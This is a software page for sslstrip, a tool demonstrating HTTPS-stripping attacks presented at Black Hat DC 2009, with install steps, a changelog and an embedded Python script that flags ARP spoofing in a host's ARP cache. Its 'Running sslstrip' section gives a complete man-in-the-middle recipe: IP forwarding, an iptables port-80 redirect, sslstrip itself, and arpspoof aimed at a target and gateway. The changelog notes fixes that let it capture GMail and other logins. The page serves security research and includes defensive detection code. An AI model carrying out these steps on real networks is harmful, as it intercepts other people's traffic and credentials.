Moxie Marlinspike >> Software >> sslstrip

Software >> sslstrip

 

This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Requirements

  • Python >= 2.5 (apt-get install python)
  • The python "twisted-web" module (apt-get install python-twisted-web)

Setup

  • tar zxvf sslstrip-0.9.tar.gz
  • cd sslstrip-0.9
  • (optional)
    sudo python ./setup.py install

Running sslstrip

  • Flip your machine into forwarding mode.
    echo "1" > /proc/sys/net/ipv4/ip_forward
  • Set up iptables to redirect HTTP traffic to sslstrip.
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
  • Run sslstrip.
    sslstrip.py -l <listenPort>
  • Run arpspoof to convince a network they should send their traffic to you.
    arpspoof -i <interface> -t <targetIP> <gatewayIP>

That should do it.

How does this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.
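The ARP step described above leaves a visible trace on the affected host: its ARP cache maps the gateway's IP address to a MAC address that another host on the segment also uses. The following check is an added example, not part of sslstrip or the original page; the sample table is constructed, and the function names and the recorded "known good" gateway MAC are assumptions.

```python
"""Flag ARP-cache entries consistent with the ARP spoofing step described above."""
from collections import defaultdict

# Constructed sample in the Linux /proc/net/arp layout (not captured data).
SAMPLE_ARP_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         00:11:22:33:44:55     *        eth0
192.168.1.23     0x1         0x2         00:11:22:33:44:55     *        eth0
192.168.1.40     0x1         0x2         66:77:88:99:aa:bb     *        eth0
192.168.1.77     0x1         0x0         00:00:00:00:00:00     *        eth0
"""

def parse_arp_table(text):
    """Return {ip: mac} for complete entries, skipping the header line."""
    entries = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, flags, mac = fields[0], int(fields[2], 16), fields[3].lower()
        # 0x2 is ATF_COM (completed entry); incomplete entries have an all-zero MAC.
        if flags & 0x2 and mac != "00:00:00:00:00:00":
            entries[ip] = mac
    return entries

def find_shared_macs(entries):
    """Return {mac: sorted ips} for every MAC claimed by more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in entries.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def check_gateway(entries, gateway_ip, known_gateway_mac=None):
    """Return a list of findings about the gateway's ARP entry."""
    mac = entries.get(gateway_ip)
    if mac is None:
        return ["gateway %s has no complete ARP entry" % gateway_ip]
    findings = []
    if known_gateway_mac and mac != known_gateway_mac.lower():
        findings.append("gateway MAC is %s, expected %s" % (mac, known_gateway_mac.lower()))
    others = [ip for ip in find_shared_macs(entries).get(mac, []) if ip != gateway_ip]
    if others:
        findings.append("gateway MAC %s also claimed by %s" % (mac, ", ".join(others)))
    return findings

if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_TABLE)
    for finding in check_gateway(table, "192.168.1.1", "aa:bb:cc:dd:ee:ff"):
        print("ALERT:", finding)
```

On a live Linux host, pass the contents of /proc/net/arp to parse_arp_table in place of the sample. A shared MAC can also be legitimate (for example a router holding several addresses), so treat a finding as a prompt to investigate.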

Development

The current development branch can be found on github.

Changes in 0.9 (05/15/11)

  • Fixed bugs introduced in 0.8 that were preventing GMail and other logins.
  • Speed enhancements.
  • Support for stripping compressed content-encodings if they slip past us.

Changes in 0.8 (04/24/11)

  • Major speed enhancements.
  • Compatibility changes for recent versions of twisted.
  • Support for stripping URLs with explicit port specifications (e.g. foo.com:443).
  • A number of small bug fixes.

Changes in 0.7 (12/18/09)

  • Fixed a minor bug that could prevent favicon spoofing from working correctly (thanks Simon Nicolussi).

Changes in 0.6 (9/22/09)

  • Fixed a silly bug in specifying the listen port with -l

Changes in 0.5 (9/11/09)

  • Switched to a fully asynchronous model, which should result in tremendous performance improvements.
  • Filter response headers.
  • Started embedding favicon links in the head section of server responses, to increase the chance that a browser will make a request for a secure favicon.

Changes in 0.4 (7/24/09)

  • Fixed a bug that would result in truncated pages.
  • Fixed a bug in relative link matching (thanks Naumaan Mohammed Nayyar)
  • Included some optimizations that should speed things up again.

Changes in 0.3 (7/15/09)

  • Fixed the regular expression compilation to work with Python 2.6.2 (thanks Simon Vans-Colina)
  • Included some optimizations that should speed things up a little.

Changes in 0.2 (02/25/09)

  • Fixed the listen port command-line option to actually work.

Changes in 0.1 (02/21/09)

  • Initial stripped-down public release.

 
